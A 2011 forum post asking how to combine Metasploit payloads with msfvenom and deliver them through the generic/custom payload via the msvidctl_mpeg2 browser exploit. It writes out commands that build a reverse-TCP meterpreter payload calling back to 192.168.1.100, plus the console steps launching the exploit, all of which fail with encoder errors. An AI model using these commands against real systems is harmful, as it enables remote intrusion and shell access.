dig2play

MSF4 custom/generic with multipayloads

Discussion created by dig2play on Oct 28, 2011
Latest reply on Oct 28, 2011 by dig2play

Hi everyone.

 

I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console  : 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a derth of informoration on what the payload supports in terms of encodings and compatibility.

 

Basically I'm looking at how a server side service can be shutdown, then have the meterpreter listen on it's no longer bound port. (the exploit would come in on another port)

 

Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (note that the custom/generic payload .rb source say something about only allowing None encoding)

 

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

 

I also tried it with EXITFUNC set to "none":

 

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

 

Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, .rb formats)

 

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

 

Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)

 

msf > use exploit/windows/browser/msvidctl_mpeg2

msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom

PAYLOAD => generic/custom

 

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw

PAYLOADSTR => c:\metasploit\test\msf.raw

msf  exploit(msvidctl_mpeg2) > exploit

 

[-] Exploit failed: No encoders encoded the buffer successfully.

 

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe

PAYLOADSTR => c:\metasploit\test\msf.exe

msf  exploit(msvidctl_mpeg2) > exploit

 

[-] Exploit failed: No encoders encoded the buffer successfully.


msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw

PAYLOADFILE => c:\metasploit\test\msf.raw

msf  exploit(msvidctl_mpeg2) > exploit

 

[-] Exploit failed: No encoders encoded the buffer successfully.

 

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe

PAYLOADFILE => c:\metasploit\test\msf.exe

msf  exploit(msvidctl_mpeg2) > exploit

 

[-] Exploit failed: No encoders encoded the buffer successfully.

 

 

So I found an explanation on what the "No encoders encoded..." error is supposed to mean. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) This is where stager payloads come in I suppose.

 

Is the cause of the error the windows/msgbox payload because its not staged? Or is it that multipayloads aren't staged? If it's the later, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

 

Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.

 

Thanks in advance! I promise to reply with how I got this working once I do.

Outcomes